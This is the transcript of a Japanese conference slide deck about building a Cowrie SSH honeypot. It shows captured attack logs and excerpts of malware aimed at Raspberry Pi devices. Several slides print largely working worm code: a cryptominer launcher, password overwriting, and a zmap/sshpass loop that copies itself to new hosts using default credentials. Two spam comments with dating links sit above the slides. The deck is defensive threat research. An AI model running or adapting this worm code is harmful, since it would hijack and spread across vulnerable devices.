Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

素人ハニーポッターがCowrie構築したってよ

5,124 views

Published on

ハニーポット運用初心者がkippoの後継Cowrieで遊んだ話
2017/09/30 ハニーポット技術交流会発表資料

Published in: Engineering
  • Follow the link, new dating source: ♥♥♥ http://bit.ly/39pMlLF ♥♥♥
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Dating direct: ❤❤❤ http://bit.ly/39pMlLF ❤❤❤
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

素人ハニーポッターがCowrie構築したってよ

  1. 1. 素人ハニーポッターがCowrie構 築したってよ Masanobu Miyagi
  2. 2. 自己紹介 • 宮城 正伸 • @RaspERMasa Raspberry piでWOLしてた人 • 株式会社ラック/Webアプリケ ーション診断 • PowerEdge R610, R710 24h/265day 稼働中 • ハニーポット歴/1ヶ月(新人)
  3. 3. CowrieをCentOS 7で 構築したお話
  4. 4. 構築は簡単 • インストール時のコマンド数がそこまで多くない • 依存関係の影響範囲 小 • 初心者でも2時間程度で構築完了
  5. 5. 構築は簡単 http://tech-study.hateblo.jp/entry/2017/08/26/075818
  6. 6. 祝・攻撃観測 • 構築後1日以内で最初の訪問者様 Welcome to My honeypot !! • 約1週間ほど続いた 現在も継続中 • 何度同じIP弾こうと思ったこry
  7. 7. 祝・攻撃観測
  8. 8. 祝・攻撃観測 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: echo -e 'x47x72x6fx70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 2017-08-26T22:23:01+0900 CMD: 2017-08-26T22:23:01+0900 CMD: /gweerwe323f 2017-08-26T22:23:01+0900 CMD: 何かのパスを叩いてるだけ。。。 実行できないけどね
  9. 9. 祝・攻撃観測 1週間ほど変化なし(同じようなログ) userdb.txtに「ログイン失敗」しているアカウント情報を追加すれば。。。 →ログイン成功させて、次の一手を見る
  10. 10. ログイン失敗 2017-09-18T22:13:30+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2059,71.212.172.157] login attempt [pi/raspberryraspberry993311] fa 2017-09-19T03:30:27+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2212,103.53.77.118] login attempt [pi/raspberryraspberry993311] faile 2017-09-19T03:33:30+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2214,98.31.13.113] login attempt [admin/admin1234] failed 2017-09-19T03:46:46+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2218,82.81.139.74] login attempt [pi/raspberryraspberry993311] failed 2017-09-19T05:13:29+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2225,122.249.98.242] login attempt [admin/motorola] failed 2017-09-19T05:13:30+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2225,122.249.98.242] login attempt [admin/aerohive] failed 2017-09-19T05:13:31+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2225,122.249.98.242] login attempt [admin/1111] failed 2017-09-19T11:41:14+0900 [SSHService 'ssh-userauth' on HoneyPotSSHTransport,2303,101.184.82.174] login attempt [pi/raspberryraspberry993311] fa Raspberry pi狙ってるみたい
  11. 11. userdb.txtにユーザ情報追加 $ vi data/userdb.txt root:x:!root root:x:!123456 (ここに追加していく) ログインに失敗しているユーザ情報を userdb.txtに追記する
  12. 12. その後 2017-09-07T17:47:49+0900 [SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,7449,78.159.192.26] CMD: mkdir -p /ro authorizedに追記したり、色々情報収集してる模様
  13. 13. 設置されたBot例 ############################################################################################## ## DDoS Perl IrcBot v1.0 / 2017 By G ## [ Help ] ########################################### Stealth MultiFunctional IrcBot writen in Perl #################################################### ## Teste on every system with PERL instlled ## !u @system ## ## ## !u @version ## ## This is a free program used on your own risk. ## !u @channel ## ## Created for educational purpose only. ## !u @flood ## ## I'm not responsible for the illegal use of this program. ## !u @utils ## ##############################################################################################
  14. 14. Raspberry piを狙う攻撃 • 数ヶ月前に流行った「マイニングマルウェア」の設置 • 勝手にマイニング始めるよ! by 攻撃者
  15. 15. Raspberry piを狙う攻撃 https://japan.zdnet.com/articl e/35102503/ Raspberry piをデフォルト設定 で運用している人は要注意! pi/raspberry このログイン情報で突破された
  16. 16. Raspberry piを狙う攻撃 #!/bin/bash MYSELF=`realpath $0` DEBUG=/dev/null echo $MYSELF >> $DEBUG rm -rf nohup.out if [ "$EUID" -ne 0 ] then sudo nohup $MYSELF &>> $DEBUG & else TMP1=`mktemp` echo $TMP1 >> $DEBUG cat > $TMP1 << EOFMARKER H4sICH7bDFkAA21pbmVyZADE/Q98VNd95w/fGY2kkTS2BxsntKFhBAIEKImISavukmSwSUoakgwY J2qjxiMQthwr9gByojRqOxISCNC0A5JtpUXRYJNW3dJ0sOVUbZV0sElKW7IlXdrl1/LanisYkG3t ht1ld8kuWz+f9zmjIGvT7v72eV6vh0S+d+4999xzz/l+P9+/55xf+8jWjwYCAW/uX9Cr9/iVXRHw Nui4dXHEC4a88g1ezAvr3lLvXdxPbb0r4m296y77F1Y5/kKlvwr9bbB/AftnK9Rfeel+GfcC/AXs 30/o90+U7pWKlv65X816F3/lpWv2fjSiv7vtnx/0vLb73Hu5r59eRPcjusdfWA/wVzGvjYkAfwH7 t1m/N8+7t63Y2eb9mH+VvFZ/7+t4Yuf7Otre0/HEU890vad17xfaH3vvvqff+4BXej5aavnPffKR Up+6d8dK9xeX+oD7U69tXPnul7puvbV6bM/XXtp9ZvJdL3yo1XN9Rflq/S1Pq3sLNZW2smgy1htu
  17. 17. Raspberry piを狙う攻撃 sudo nohup $TMP2 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 45hgMAs1sNdMs7H9aCQm8oMCG5HGg37nv9Ab5r8u4R9gcWkSteobyt6faT & sleep 3 rm -rf $TMP2 rm -rf /tmp/ktx* rm -rf /tmp/cpuminer-multi echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts rm -rf /root/.bashrc rm -rf /home/pi/.bashrc usermod -p $6$U1Nu9qCp$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1 pi for pid in `netstat -pant | grep -v "ssh" | grep -v "minerd" | grep ESTABLISHED | awk -F ' ' '{print $7}' | awk -F '/' '{print $1}'` do echo $pid kill -9 $pid done マイニングプールに接続するらしい
  18. 18. Raspberry piを狙う攻撃 Part 2 chmod +x /tmp/$BOT nohup /tmp/$BOT 2>&1 > /tmp/bot.log & rm /tmp/nohup.log -rf rm -rf nohup.out sleep 3 rm -rf /tmp/$BOT NAME=`mktemp -u 'XXXXXXXX'` date > /tmp/.s apt-get update -y --force-yes apt-get install zmap sshpass -y --force-yes while [ true ]; do FILE=`mktemp` zmap -p 22 -o $FILE -n 100000 killall ssh scp for IP in `cat $FILE` do sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyCheckin g=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o Use rKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o Stric tHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredA uthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & done rm -rf $FILE sleep 10 done fi BOT化を企むものも設置されてました。。。
  19. 19. 今回設置されたファイルたち • IRC Bot md5 : 84fa8f6d0dd1c7c4aff192a662746ec3 • Raspberry pi マイニングマルウェア md5 : 81d98d94c3ff744a6087961f41b096da
  20. 20. まとめ
  21. 21. まとめ • 初心者でもハニーポットでここまで遊べる! • 最近の流行はマイニングマルウェア? • 攻撃者の考えなどを知る良いきっかけになった
  22. 22. Thank you for listening

×